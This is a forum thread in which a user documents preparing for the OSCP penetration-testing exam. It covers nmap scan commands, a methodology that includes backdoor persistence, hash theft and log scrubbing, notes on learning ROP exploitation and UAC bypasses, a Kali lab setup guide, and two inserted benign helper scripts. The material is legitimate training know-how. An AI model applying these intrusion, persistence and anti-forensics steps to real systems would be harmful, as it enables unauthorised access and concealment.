OSCP - JollyFrogs' tale

JollyFrogs Member Posts: 97
I'll be starting my OSCP journey soon; that is to say: I have already started preparations for the journey but have not signed up to the course yet. I am spending a lot of time sharpening my axe in anticipation of the OSCP tree that yearns to be felled. I have done away with modesty and challenged myself with the goal to subvert 100% of the lab machines and get a 100% marking score on my exam, first try. I am very lucky to have a very understanding second half who fully supports my endeavor. 600 hours of self-study and lab time have been set aside for this great adventure.

My basic plan is as follows:
- Read as many forums and blogs as I can - This task is complete
- Utilize the resources from those forums and blogs to prepare - This is where I am now
- After preparing, I will sign up for the OSCP study and maximize my lab time

I will dedicate 2-3 hours per day plus 8-10 in the weekends to studies. I'll sign up for 3 months lab and should be able to put in more or less 360 hours of lab time if I prepare well. Seeing there are about 60 machines in the lab, that's an average of 6 hours per machine owned. I never expected this to be easy.

My preparation tasks are proceeding well. I will detail more about my preparations in days to come.

Comments

  • JollyFrogs Member Posts: 97
    I got introduced to the OSCP certification during an interview where the interviewer asked me if I had the OSCP credential. After the interview I immediately looked up OSCP on google and found a wealth of information in forums and blog entries about the course. After reading many posts and blogs, I decided that I wanted (read "wanted" and not "needed") to do the OSCP, so I started doing lots of research into OSCP and the materials. I learnt that the primary required attribute of any pentest is the preparation and enumeration phase. I learnt about how hard the labs were, and that some machines like Sufferance, Pain and Gh0st were amongst the hardest, toughest nuts to crack. This appealed to me and I set myself a challenge: To hack each and every machine in the labs, and to pass my exam with a 100% score. There are around 60 lab machines and many people struggle in the labs, so this is going to be quite the achievement. I would have to maximize my time in the labs as much as possible if I wanted a chance at hacking (aka "owning" or "pwning") each and every machine that was presented to me.


    After reading many forums, blogs, tweets, and any other information I could get my hands on, I realised that I would have to prepare thoroughly if I wanted to maximise my time in the labs. I've read about some people taking 4 weeks just to get through the course materials, then another 4 weeks to get everything in order before they can access the labs. I was not going to let that happen to me; I wanted to start tackling the labs from the get go. I asked my partner if she was ok with me disappearing into virtual labs every night and every weekend for the next 3 months; she is very supportive.


    One of the most important aspects of my preparations would be to decide what note-keeping software I was going to use. OSCP recommends a program called "KeepNote", but me being me, I decided to make up my own mind. So I spent two full days trying various note-keeping tools. I tried CherryTree, KeepNote, EverNote, OneNote, NoteCase, Zim, KeyNote, and many more. I had certain requirements for what a good note-keeping tool would have to do if I wanted to maximise my time in the labs:
    - Hierarchical (tree with sub branches and "leaves" aka pages)
    - Easy screen Clipping feature (press a shortcut and the program inserts a screenshot for you in your notes)
    - NOT in the cloud (I prefer not to put personally identifiable items in the cloud)
    - Export into .PDF or .DOC format so I didn't have to rewrite my report after taking the notes


    CherryTree, KeepNote and OneNote were my preferred tools. I really liked OneNote with one exception: The free version of OneNote forces you to save everything into the cloud, unencrypted. CherryTree looked good, plenty of addons and plugins and it could do what I wanted although simple things like setting up screen clipping were very clumsy. I eventually settled on KeepNote, due to its simple layout and integrated screenshot functionality. The only downside of KeepNote is that it can't save its output in .PDF format. But when I thought about that requirement a bit more, it didn't make sense to just compile my notes in a .PDF and send that off to the OffSec guys: Plenty of items in my notebook would be for personal use only or not relevant to the exam. Many screenshots I might not need or want in the report so I would probably have to compile a separate report anyway, which I have decided to do in Word, using the information and screenshots in KeepNote.


    I've started using KeepNote now and I'm very satisfied with the decision to use KeepNote, having tried many other tools. I'm writing this note in KeepNote!


    Tips on using KeepNote:
    - Take a screenshot by pressing CTRL-INSERT.
    - Run KeepNote off an SSD hard drive otherwise it can be sluggish.
    - If possible, don't attach files into KeepNote or it might corrupt your notes. Try to keep sploits/files in a separate directory on your PC.
    - Spend a few hours setting up your folder structure.
    - Make frequent backups. I backup my KeepNote notebook every 3-4 hours.
  • veritas_libertas Member Posts: 5,746
    Sounds like fun. I'm hoping to get to the OSCP eventually. Right now I'm slowly working through eJPT and then eCPPT. If you want to be "elite" you could use VIM for note keeping ;)

    Good luck with the OSCP!
  • justjen Member Posts: 77
    Thank you for sharing your thoughts on tools for note-keeping. I am working on enhancing my skill set and doing some advance prep work, before beginning my OSCP journey. My plan for this summer is to learn python, develop a greater comfort level with Kali Linux, and do some self-study to refresh my basic pentesting knowledge, before registering for PWK in the fall.

    One of the things I had on my checklist was to find a tool that would work well for organizing and managing extensive sets of notes. Your comments will be very useful when I am choosing a tool for notes. :)

    Thanks again!
    ~justjen
  • JollyFrogs Member Posts: 97
    Another week has passed, and I'm having a blast with the OSCP preparations so far. I haven't even registered for the course yet, as I am still sharpening my axe. I've started thinking about a calculated approach for pen-testing. I felt the generic approach was a bit vague, so I have come up with a much more detailed approach. I intend to script as many of the steps as possible; I've started scripting 1) and 3).


    The system I came up with (which I will probably tune once I get started in the labs) is as follows:


    1) Recon scripts: Automated recon of a network. This will give us a generic idea of what kind of machines are on the network and the various OS's and possible "sweet spots" to start the exploitation process. Only the top 10-20 ports are scanned but we're scanning the whole /24 range.

    2) Mapping scripts: Mapping is where I aggregate the data gathered from the recon scripts and start to make sense of things. This includes relationships between systems and traffic flows. This is a manual step which will be done in Visio manually. I have built a Visio template diagram which I will use for this purpose. Mapping will be a continuous process as I move forward in the lab and the Visio diagram will be updated on an almost daily basis.

    3) Remote enumeration scripts: These are scripts which will scan a single system remotely, mostly enumerating ports and shares but also the information FROM those ports. This is where the full 1-65535 ports will be scanned (both TCP and UDP) and where each port is fingerprinted, SMB shares are enumerated, user IDs, SNMP details, FTP banners, OS versions etc

    4) Remote Exploits & Privilege Escalation: Here we move from knocking on the door to bashing the door out of its sockets and forcing entry into the remote system. This includes remote "point-and-shoot-instant-system-access", FTP brute-force, HTTP directory brute force, SNMP brute force, active exploits against open services, etc

    5) Local Enumeration scripts: Once we have entered the machine remotely, we enumerate again, getting as much information from the system as possible. This includes interesting files, bash history, cmd history, environment settings, memory, running services, directory permissions, service permissions, scheduled jobs, weak permissions etc

    6) Local Exploits & Privilege escalation: We might have a low level user, or a restricted administrator account, this is where we escalate to full root/system level access. This includes UAC bypass, elevation scripts, local exploits, brute forcing, etc

    7) Persistence: This is where we install backdoors to secure our access. We don't want to have to go through the whole steps above again. Things like adding local administrator accounts, setting a service to start automatically on boot, putting a pinhole in the firewall service, etc

    8) Root Loot scripts: This is where we search the whole system with system/root access for interesting data. This includes stealing hashes from LSA, configuration scripts, SAM/shadow database, cracking MD5 and NTLM, checking currently connected users, checking relationship between this host and other hosts, etc

    9) Cleanup: This is where we scrub logfiles, clean exploits, hide backdoors, essentially we "wipe our fingerprints" from the system

    10) Update maps and diagrams, and move to another system on point 3)
  • wd40 Member Posts: 1,017
    Great detailed post, Thanks.

    Please continue posting, I am sure people will be following your posts.

    I wish I had the willpower to do this ..
  • MrAgent Member Posts: 1,310
    Just a word of advice. If you're going to script out scanning, make sure you have something in place to scan even if ICMP is not enabled on the target.
  • Mitechniq Member Posts: 286
    I believe I am missing something here, why are you going through the effort of building out your own scripts when Kali has all the modules and tools to Pen-Test? Since you will be using Kali for the labs and the exams, wouldn't it just be better to download Kali and familiarize yourself with it?
  • MrAgent Member Posts: 1,310
    A part of the course is bash scripting. I did the same thing during my lab time. Scripting out a scan will allow you to automate a lot of stuff; it's very useful.
  • NovaHax Member Posts: 502
    Mitechniq wrote: »
    I believe I am missing something here, why are you going through the effort of building out your own scripts when Kali has all the modules and tools to Pen-Test? Since you will be using Kali for the labs and the exams, wouldn't it just be better to download Kali and familiarize yourself with it?

    You are exactly right. There is absolutely no reason to automate discovery during the PWK course. Just use Nmap.

    For a lot of people though, OSCP is one of their first encounters with scripting and automation. The course demonstrates basic automation within the context of scanning and people often tend to get the idea that they need to do this, when in fact, the course is really just trying to demonstrate automation fundamentals.

    I've literally seen people get so wrapped up in this part of the course that they completely forget the objective is to start popping boxes.
  • JollyFrogs Member Posts: 97
    Mitechniq wrote: »
    I believe I am missing something here, why are you going through the effort of building out your own scripts when Kali has all the modules and tools to Pen-Test? Since you will be using Kali for the labs and the exams, wouldn't it just be better to download Kali and familiarize yourself with it?

    I don't believe that using a powerful tool such as Metasploit will teach the level of fundamentals that I am seeking.

    I learned about fuzzing, assembly language, endian systems, memory and debuggers. The easy path would have been to use a readily available fuzzing tool, or a proof of concept code and modify the shell code to open a shell to a slightly different IP address.

    I chose the hard way and wrote a Python script (I had never seen a Python script until 2 weeks ago) to fuzz the application, based on another exploit I had written for a more basic application. The result of coding the fuzzer myself is that I know what each and every line of code does and why it is there. In the process of exploiting VulnServer.exe I created a generic process for writing exploits.

    I seek not just to admire the magic, but to understand and master it.
    MrAgent wrote: »
    Just a word of advice. If you're going to script out scanning, make sure you have something in place to scan even if ICMP is not enabled on the target.

    Agreed, I was anticipating firewalls blocking ICMP. These are the commands I decided on using:

    1) Start with a recon scan of the network to get an idea of the network:
    nmap -Pn -F -sSU -T5 -oX /root/10.1.1.1-254.xml 10.1.1.1-254 | grep -Ev 'filtered|closed' > /root/quick_recon.txt

    2) Then force-scan all ports UDP + TCP per host (takes about 4 minutes per host on a LAN or roughly 17 hours for 254 hosts):
    nmap -Pn -sSU -T4 -p1-65535 -oX /root/10.1.1.110.xml 10.1.1.110 | grep -Ev 'filtered|closed'

    3) Then run an intensive scan on the open ports per host, TCP and UDP separately to speed scan up:
    tcp: nmap -nvv -Pn -sSV -T1 -p$(cat 10.1.1.110.xml | grep portid | grep protocol=\"tcp\" | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -oX /root/10.1.1.110-intense-tcp.xml 10.1.1.110
    udp: nmap -nvv -Pn -sUV -T1 -p$(cat 10.1.1.110.xml | grep portid | grep protocol=\"udp\" | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -oX /root/10.1.1.110-intense-udp.xml 10.1.1.110

    Note: During the lab time, I intend to reset the host before doing a full port scan. I will reset each host before I attack it to ensure that there are no spoilers or backdoors on the host.
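The grep/cut pipeline in step 3 pulls every port element out of the -oX file, whatever its state, so closed or filtered ports can end up in the follow-up -p list. Below is an added example, not code from this thread, that reads the nmap XML with ElementTree and keeps only ports whose state is "open" (optionally "open|filtered" for UDP); the XML it embeds is a constructed sample, not a real scan.

```python
"""Extract open ports per protocol from nmap -oX output (added example)."""
import sys
import xml.etree.ElementTree as ET

# Constructed sample of nmap XML output for one host; not a real scan result.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
<host><address addr="10.1.1.110" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh"/></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http"/></port>
<port protocol="tcp" portid="445"><state state="filtered" reason="no-response"/></port>
<port protocol="udp" portid="161"><state state="open" reason="udp-response"/><service name="snmp"/></port>
<port protocol="udp" portid="53"><state state="open|filtered" reason="no-response"/></port>
</ports></host></nmaprun>"""


def open_ports(xml_text, proto, include_open_filtered=False):
    """Return {ipv4_address: [sorted open port numbers]} for one protocol.

    Only <port> elements whose <state> is "open" count; UDP ports that nmap
    reports as "open|filtered" are included only when the caller asks for them.
    """
    root = ET.fromstring(xml_text)
    result = {}
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        ip = addr.get("addr") if addr is not None else "?"
        ports = []
        for port in host.iter("port"):
            if port.get("protocol") != proto:
                continue
            state = port.find("state")
            st = state.get("state") if state is not None else ""
            if st == "open" or (include_open_filtered and st == "open|filtered"):
                ports.append(int(port.get("portid")))
        result[ip] = sorted(ports)
    return result


def port_spec(ports):
    """Render a port list as the comma-separated form nmap's -p option takes."""
    return ",".join(str(p) for p in ports)


if __name__ == "__main__":
    # Pass the path of an -oX file to parse a real scan; otherwise use the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    for proto in ("tcp", "udp"):
        for ip, ports in open_ports(text, proto, include_open_filtered=(proto == "udp")).items():
            print("%s %s: -p%s" % (ip, proto, port_spec(ports) or "(none)"))
```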
  • JollyFrogs Member Posts: 97
    I learnt about ROP chains yesterday. Very interesting stuff. How did I get into ROP chains, and what are they? Ohhh good question, let's go back in time! Keep in mind, I haven't yet started the course, this is all part of my preparations to maximize lab time.

    In the OSCP Syllabus (available here: https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf) a "Crossfire" application is mentioned. I went to exploit-db.com and saw that crossfire 1.9.0 is vulnerable to a buffer overflow (https://www.exploit-db.com/exploits/1582/). The code is in C and is overly complex for my needs (dynamic shellcodes etc). The code abuses an overflow in the "setup sound" module and I had to fuzz the application with various codes until I found the exploit code I needed and the server crashed. I am running the Crossfire application on my Kali machine and use Evan's Debugger which comes as part of the Kali distribution. After crashing the server, finding the bad characters and being able to overwrite the EIP, I sent my reverse shell in anticipation of a prompt... and nothing happened!

    In EDB I saw a segmentation fault. This was new. I put a breakpoint on the JMP ESP trampoline I had set up to jump to my shell code, and reran the sploit. EDB broke out at my JMP ESP trampoline, I pressed F8 to step one instruction further and surely I was in my jump code which was about to jump to my shell code. When I pressed F8 on the first instruction in my jump code I got a segmentation fault. This was new and unexpected! Why would the program segment fault on a perfectly good instruction? I started googling "Linux memory segmentation fault" which gave too many results, I then searched "linux segmentation fault exploit" and found "c - Exploiting buffer overflow leads to segfault - Information Security Stack Exchange" which hints toward a feature called ASLR and "-z execstack". Further research indicates that these are two memory protection mechanisms: ASLR randomizes the memory address space and the -z execstack relates to a feature called execshield (aka "NX bit", aka "DX", aka Execute Disable, aka DEP, aka many other names). I checked on my Kali machine whether this might be the culprit with the following command "dmesg | grep --color '[NX|DX]*protection'" and indeed, NX was enabled. Further investigation into the possibility to disable the NX bit (including via my VirtualBox option "Enable PAE/NX") showed it would just result in Kali emulating NX and not really solve my problem in the first place: If this was a remote host, would I be able to disable NX via its host system or via kernel options? The answer is most likely no, unless I had some kind of root/system/god-mode access to the network in which case the exercise would not be required.

    DEP/NX works very simply: If memory is R/W, then it can't be X. If memory is R/X, then it can't be W. So if we can WRITE to the memory (stack) then we can't EXECUTE it (hence the segmentation fault). If we can EXECUTE it, we can't WRITE to it.

    So I started looking into the option to exploit this "NX bit" and whether I could program around it: Enter ROP! ROP stands for Return Oriented Programming. Where normal programs use the EIP address to point to the next instruction, ROP uses the ESP address to point to the next instruction. How can this be? Well, it turns out that any "RET" instruction in a program looks up the original source address which it gets from the ESP, not the EIP. So while normally we'd try to control the flow of a program with EIP, with ROP we try and control the flow of the program with ESP. Let me explain:

    Normal execution: MOV EAX,1 -> EIP increased by one which points to the next instruction -> MOV EBX,1 -> EIP increased by one which points to the next instruction etc
    ROP execution: ESP points to RET -> return address taken from ESP stack -> ESP points to another RET -> EIP never gets a chance to play

    So what good is it to execute RET instructions the whole time? Well not much. But here comes the genius: If we can find OTHER instructions just before the RET instructions, we can have the system execute those instructions, the RET will be next which we control because we control the ESP stack. We can't WRITE the instructions we're using, but we can EXECUTE them (and as such, DEP allows us to execute).

    And that's where I am now, do I install a vulnerable operating system without NX support and simply follow the exercises, or do I write a ROP exploit for Crossfire 1.9.0? The ROP exploit is tempting but will be time-consuming, it could take me a week to finish a ROP exploit, which I could spend on finishing my preparations. I'll keep you posted!
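The "-z execstack" setting the post runs into is recorded in the binary itself as the PT_GNU_STACK program header: if that header's flags include PF_X, the kernel maps the stack RWX and NX does not protect it. The following is an added example, not code from this thread, that reads an ELF file's program headers and reports the stack policy; the minimal ELF it builds for the demonstration is constructed, and the parser also works on real 32- or 64-bit ELF files.

```python
"""Report whether an ELF binary asks for an executable stack (added example)."""
import struct
import sys

PT_GNU_STACK = 0x6474E551          # program header type written by GNU toolchains
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4   # segment permission bits


def stack_flags(data):
    """Return the p_flags of the PT_GNU_STACK header, or None if it is absent."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]   # class: 1=32-bit 2=64-bit; data: 1=LE 2=BE
    end = "<" if ei_data == 1 else ">"
    if ei_class == 1:
        (e_phoff,) = struct.unpack_from(end + "I", data, 28)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 42)
    elif ei_class == 2:
        (e_phoff,) = struct.unpack_from(end + "Q", data, 32)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 54)
    else:
        raise ValueError("unknown ELF class %d" % ei_class)
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if ei_class == 1:
            # Elf32_Phdr: p_type at offset 0, p_flags at offset 24
            (p_type,) = struct.unpack_from(end + "I", data, off)
            (p_flags,) = struct.unpack_from(end + "I", data, off + 24)
        else:
            # Elf64_Phdr: p_type at offset 0, p_flags at offset 4
            p_type, p_flags = struct.unpack_from(end + "II", data, off)
        if p_type == PT_GNU_STACK:
            return p_flags
    return None


def stack_is_executable(data):
    """True when the stack would be mapped executable: PF_X is set, or there is
    no PT_GNU_STACK header at all (which Linux on x86 treats as executable)."""
    flags = stack_flags(data)
    return flags is None or bool(flags & PF_X)


def describe_flags(flags):
    """Render p_flags as an rwx string, e.g. 6 -> 'rw-'."""
    if flags is None:
        return "(no PT_GNU_STACK)"
    return (("r" if flags & PF_R else "-") +
            ("w" if flags & PF_W else "-") +
            ("x" if flags & PF_X else "-"))


def build_elf64(p_flags):
    """Constructed sample: a bare little-endian ELF64 x86-64 header followed by a
    single PT_GNU_STACK program header carrying the given flags."""
    ehdr_size, phdr_size = 64, 56
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # 64-bit, LE, version 1
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH",
                               2, 62, 1, 0,          # ET_EXEC, EM_X86_64, e_version, e_entry
                               ehdr_size, 0, 0,      # e_phoff, e_shoff, e_flags
                               ehdr_size, phdr_size, 1, 0, 0, 0)
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, p_flags, 0, 0, 0, 0, 0, 0x10)
    return ehdr + phdr


if __name__ == "__main__":
    # With a path argument, inspect that binary; otherwise use the constructed sample.
    path = sys.argv[1] if len(sys.argv) > 1 else None
    blob = open(path, "rb").read() if path else build_elf64(PF_R | PF_W | PF_X)
    flags = stack_flags(blob)
    verdict = "EXECUTABLE" if stack_is_executable(blob) else "non-executable (NX applies)"
    print("%s: stack %s -> %s" % (path or "constructed sample", describe_flags(flags), verdict))
```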
  • wes allen Member Posts: 540
    You should read up on EMET, and how to bypass it, if you are interested in learning more about modern memory protections.
  • JollyFrogs Member Posts: 97
    wes allen wrote: »
    You should read up on EMET, and how to bypass it, if you are interested in learning more about modern memory protections.

    Hi Wes,

    Thanks. The current exploit I'm writing runs on Linux and EMET seems to use similar techniques to the Linux memory protections. I've decided to go the hard way and write a ROP exploit for Crossfire 1.9.0 running on Kali 1.1.0a. I will read up on EMET after I get success - which could take considerable effort and time.
  • JollyFrogs Member Posts: 97
    Ok, so after spending two full days programming ROP chains, I finally created a working ROP chain which works on the Kali PAE image. I now realize that I have been working with the wrong image from the very start.

    So here is a tip:
    When downloading the Kali image from the offensive security site (https://www.offensive-security.com/kali-linux-vmware-arm-image-download/) make sure you choose the image called "Kali 32 bit VM" and not the image called "Kali 32 bit PAE VM" like I did haha, I learnt today that sometimes, more is not better :)

    I did learn a lot by using the PAE image:
    - Built a working ROP chain
    - Used gdb and edb debuggers more proficiently
    - Wrote scripts more efficiently
    - Found lots of interesting websites in the process
    - Got better at python scripting
    - Learnt some really cool assembly tricks
    - Learnt to decompile shellcode to assembly code to analyze what it does
    - Learnt to write my own shellcode in assembly, compile it and run it!
    - including my own first assembly reverse shell

    But, I must keep on track, it's time to move on to web application vulnerabilities and SQL injection, woop woop!
  • JollyFrogs Member Posts: 97
    JollyFrogs, Brisbane Australia
    Version: 0.1
    Revision date: 26 May 2015


    Welcome message
    This is my OSCP build guide, the goal of this guide is to help set up a Linux Kali machine on VirtualBox for OSCP studying.
    Note: This guide is written for Windows 7 64-bit Host OS, I strongly advise using this operating system to install your OSCP machines.


    This is the hardware that I used to set up this lab, if you don't have similar or better hardware, I advise investing a little in getting good hardware:
    Asus Maximus Hero VI motherboard
    32GB memory (Kingston)
    Intel 120GB SSD
    Core i7-4770K CPU @ 3.50GHz, 4 Core(s), 8 Logical Processors
    Windows 7 64-bit (6.1.7601 SP1)


    I have created this lab using my own network IP addressing, details of which are:
    (All subnet masks in the LAN are /24 aka 255.255.255.0)


    The following components are what I start with, just my PC and a router which I used as default gateway to connect to the internet:
    10.1.1.1 = My physical internet router (a Ubiquiti ERLite3) which acts as my default gateway and DNS server.
    10.1.1.200 = My main PC LAN interface, we will lose this IP when we configure a BRIDGE interface later


    The following IP addresses are used for various components that are added during this guide:
    10.1.1.200 = My main PC BRIDGE interface
    10.1.1.199 = Kali 1.1.0a VirtualBox VM


    You have two options when following this guide:
    1) Rename all references to the IP addresses above and in this guide to IP addresses you are using on your LAN.
    or
    2) Renumber your internal network IP addressing to use the same IP addresses as in this guide.


    You do not need hardware components to set up this lab other than a beefy PC, everything is virtualized in your PC.


    Preparations


    Note: The fun part begins in the section called "After Reboot", but don't skim over these first steps; they are the foundation of your environment. Any mistake here will affect your environment later in unpredictable ways, please take the time to go through these steps carefully. Spelling matters, typos matter. If you run into any issues during installation, please re-read the instructions carefully and ensure you haven't made a typo.


    IMPORTANT NOTE: I don't isolate hosts on my network. This is a very *UNSAFE* practice, especially when meddling with vulnerable applications and systems while coding and testing new exploits. I run a simple but good firewall (Ubiquiti ERLite3) which protects my network from outside attacks, but more importantly, I have off-line backups of all my important files and documents. If this is something that you don't feel 100% comfortable with, then you should set up an isolated network which is totally segregated from your home network. VirtualBox supports this kind of set up via "Host-only adapters".


    Get required files:
    VirtualBox 4.3.26 R98988:
    http://dlc-cdn.sun.com/virtualbox/4.3.26/VirtualBox-4.3.26-98988-Win.exe


    Kali 1.1.0a (kali-linux-1.1.0a-i486.iso):
    http://images.offensive-security.com/kali-linux-1.1.0a-vm-486.7z
    NOTE: For the OSCP exam, you'll need the 32-bit Kali, NOT the 64-bit as people have reported issues with 64-bit.
    NOTE: Don't get the "PAE" version of Kali linux! We'll be running buffer overflows on your Kali and PAE will make the exercise needlessly hard.


    Create and bridge a loop-back adapter so your virtual machines can talk to your physical PC and network
    - Click the Windows Start button (bottom left)
    - type "cmd" but do not press enter
    - Right-click "cmd.exe" (top of start bar menu) and select "run as Administrator" (Click "Yes" to confirm)
    Note: In the black cmd.exe screen:
    - type "hdwwiz.exe" and press Enter
    Note: the "Add Hardware Wizard" window opens
    - Click "Next"
    - Select “Install the hardware that I manually select from a list (Advanced)” and click "Next"
    - Select “Network adapters” and click "Next"
    - Select “Microsoft” and “Microsoft Loopback Adapter” under Manufacturer and Network Adapter respectively, then click "Next"
    - Click "Next" to install the loopback adapter
    - Click "Finish" to close the "Add Hardware" screen
    Note: We're still in the black cmd.exe screen:
    - type "ncpa.cpl" and press Enter
    Note: the "Network Connections" window opens
    - Right-click the adapter "Microsoft Loopback Adapter" and select "Rename"
    - Rename the Loopback Adapter to "LOOPBACK" to remove confusion later
    - Right-click your wired network adapter and select "Rename"
    - Rename your wired network adapter to "LAN"
    - Highlight (left click while holding CTRL key pressed) both the LOOPBACK adapter and your LAN network adapter
    - Right click on the LOOPBACK while both adapters are highlighted and select "Bridge Connections"
    Note: This will create a new network card called "Network Bridge"
    - Right-click your new bridge adapter and select "Rename"
    - Rename your wired network adapter to "BRIDGE"
    - Right-click "BRIDGE" and select "Properties"
    In the "BRIDGE Properties" screen:
    - Left-click (this highlights) "Internet Protocol Version 4 (TCP/IPv4)" and click "Properties"
    In the "Internet Protocol Version 4 (TCP/IPv4) Properties" screen:
    In the "General" tab at the top:
    Select "Use the following IP address"
    IP address: 10.1.1.200
    Subnet mask: 255.255.255.0
    Default gateway: 10.1.1.1
    Preferred DNS server: 10.1.1.1
    Alternate DNS server: <leave blank>
    - Click "OK" to close the "Internet Protocol Version 4 (TCP/IPv4) Properties" screen
    - Click "Close" to close the "BRIDGE Properties" screen
    Note: We're still in the black cmd.exe screen:
    - type "ping www.google.com"
    Note: You should see replies from the google web server. Your BRIDGE adapter is now your main network adapter
    Note: Do not proceed if you do not have internet connectivity
    - Close the "Command Prompt" black cmd.exe screen


    Install VirtualBox
    Run "C:\GNS3\INSTALLERS\VirtualBox-4.3.26-98988-Win.exe"
    Note: Click "Yes" on any opening warnings
    - Click "Next"
    - Click "Next" (install all options)
    - Click "Next"
    - Click "Yes"
    - Click "Install" to start the installation
    - Click "Yes" at the UAC warning screen
    - Click "Install" to install the device driver
    - Click "Finish"


    Install Kali 1.1.0a on VirtualBox 4.3.26 R98988
    Unzip the file kali-linux-1.1.0a-vm-486.7z to E:\VIRTUALBOX_DISKS\kali\


    Start "Oracle VM VirtualBox"
    - Click "New"
    Name: Kali110a-32bit-NOPAE
    Type: Linux
    Version: Debian (32 bit)
    - Click "Next"
    MB: 1024
    - Click "Next"
    Select "Use an existing virtual hard drive file"
    - Click the little yellow folder with the green arrow
    Choose: "E:\VIRTUALBOX_DISKS\kali\Kali-Linux-1.1.0-vm-486.vmdk"
    - Click "Create"
    NOTE: A new icon "Kali110a-32bit-NOPAE" was created in your "Oracle VM VirtualBox Manager"


    NOTE: Leave settings at default unless otherwise stated below
    NOTE: I'm showing some important settings even though they are defaults, in case the defaults change some day
    - Right-click "Kali110a-32bit-NOPAE" in the left menu and click "Settings..."
    General - Advanced - Shared Clipboard: "Bidirectional"
    System - Motherboard - Floppy: Untick
    System - Processor - Enable PAE/NX: Make sure this is NOT ticked
    Audio - Enable Audio: Untick
    Network - Adapter 1 - Enable Network Adapter: Tick
    Network - Adapter 1 - Attached to: "Bridged Adapter"
    Network - Adapter 1 - Name: "MAC Bridge Miniport"
    Network - Adapter 1 - Advanced - Adapter Type: "Intel PRO/1000 MT Desktop (82540EM)"
    Network - Adapter 1 - Advanced - Promiscuous Mode: Allow All
    Network - Adapter 1 - Advanced - MAC Address: 444444444444
    NOTE: Set the MAC address to an easily identifiable MAC
    Network - Adapter 1 - Advanced - Cable Connected: Tick
    - Click "OK" to close the "Kali110a-32bit-NOPAE - Settings" screen
    - Right-click "Kali110a-32bit-NOPAE" in the left menu and click "Start"


    Note: A new screen "Kali110a-32bit-NOPAE [Running] - Oracle VM VirtualBox" opens and the Kali Linux installer will boot.


    In the "Kali110a-32bit-NOPAE [Running] - Oracle VM VirtualBox" screen:
    Your new Kali installation will boot, let it time out for 5s in the GRUB menu
    You will be presented with the Kali login screen
    Click anywhere in the screen with your mouse
    Note: To unlock the mouse from Virtualbox, press the rightmost CTRL key on your keyboard
    - Click on "Other..."
    - Username: root <enter>
    - Password: toor <enter>
    Note: You will be presented a desktop environment.
    Note: Do *NOT* update Kali linux, we'll make a backup first so you can go back to a clean Kali installation


    In the top of the screen, click the black >_ icon ("terminal")
    In the "root@Kali110a:~" terminal window type (omit "root@kali:~# "):
    root@kali:~# ifconfig
    Note: You should see eth0 has an IP address
    root@kali:~# ping 8.8.8.8
    Note: You should see replies from 8.8.8.8
    - Close the "root@kali:~" terminal window
    Press the right-most CTRL key on your keyboard to unlock the mouse
    In the top menu bar of the "Kali110a-32bit-NOPAE [Running] - Oracle VM VirtualBox" screen:
    - Click "Devices" -> "Insert Guest Additions CD Image..."
    - Click "Cancel" in your Kali desktop popup to dismiss the autorun popup
    In the top of the screen, click the black >_ icon ("terminal")
    In the "root@kali:~" terminal window type (omit "root@kali:~# "):
    root@kali:~# cp /media/cdrom/VBoxLinuxAdditions.run .
    root@kali:~# ./VBoxLinuxAdditions.run
    Note: VirtualBox Linux Guest additions will now install
    root@kali:~# reboot
    Note: After rebooting you will notice that your mouse magically enters and exits the VM. This is because of the VirtualBox Additions!
    - Press <Enter> on "Other..."
    Username: root <enter>
    Password: kali <enter>
    - Right-click "VBOXADDITIONS_4.3.18_96516" and click "Eject" near the bottom
    Note: Now that you have installed the VirtualBox additions to Kali, you can:
    - Seamlessly move the mouse in and out of the virtual machine
    - Copy/Paste to and from the virtual machine using clipboard
    - Share folders between the virtual machine guest and your host machine
    In the top of the screen, click the black >_ icon ("terminal")
    In the "root@kali:~" terminal window type (omit "root@kali:~# "):
    root@kali:~# shutdown -h now
    Note: Now that we have a good clean install of Linux Kali, we'll back it up so you can restore a clean install in minutes if required


    In the "Oracle VM VirtualBox Manager" window:
    - Click "File" -> "Export Appliance..."
    - Left-click "Kali110a-32bit-NOPAE" to highlight it
    - Click "Next >"
    File: "D:\STUDY\OSCP\VIRTUAL_MACHINES\VANILLA_BACKUPS\Kali110a-32bit-NOPAE.ova"
    Format: "OVF 1.0"
    Write Manifest file: Tick
    - Click "Next >"
    - Click "Export"
    Note: The export can take quite a while
    Note: After the export finishes, we have completed the installation of Kali in your network!
  • JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
    I've focused on the Windows platform in recent days. I managed to grab my notebook and took notes while falling down the rabbit hole. I've counted 493 pages in my notebook so far, of which about half is scripts and text.


    Over the last few days I've learnt/done:
    - Default Windows UAC settings are easy to bypass as long as the setting is not set to "Always prompt me when programs try to run with elevated privileges". By default, Windows 7 has this setting disabled. I've coded several pieces of code that allow me to run my own programs without being prompted by UAC. I'm not sure if I will need this functionality in the labs, but if I do, it will save me some research and compilation.
    - A properly built and secured Windows machine is not trivial to exploit.
    - I've been building a list of "interesting files" as part of my ever growing "loot list". I'll be enumerating 3 times per host: The first time is during remote enumeration, the second time I will enumerate as a low privilege user, the third time I will enumerate as the system/root account. Literally "Enumerate, Enumerate and Enumerate some more". The enumeration scripts for the local user and root user are very similar: After all, I don't know which files I will have access to under either account so I have to run all checks in my loot list, without prejudice. Would I expect an admin to give world readable permissions to the shadow file? No, but someone else might! For instance, a badly configured machine might allow access to the SAM database as a low privileged user, so any loot that would be interesting to run under the root account would be equally (if not more) interesting under the low privilege account. Similarly, some files might be hidden to my low privilege user which will only be reachable under the system/root account.
    - I worked on my windows one-liner command skills, learnt a lot
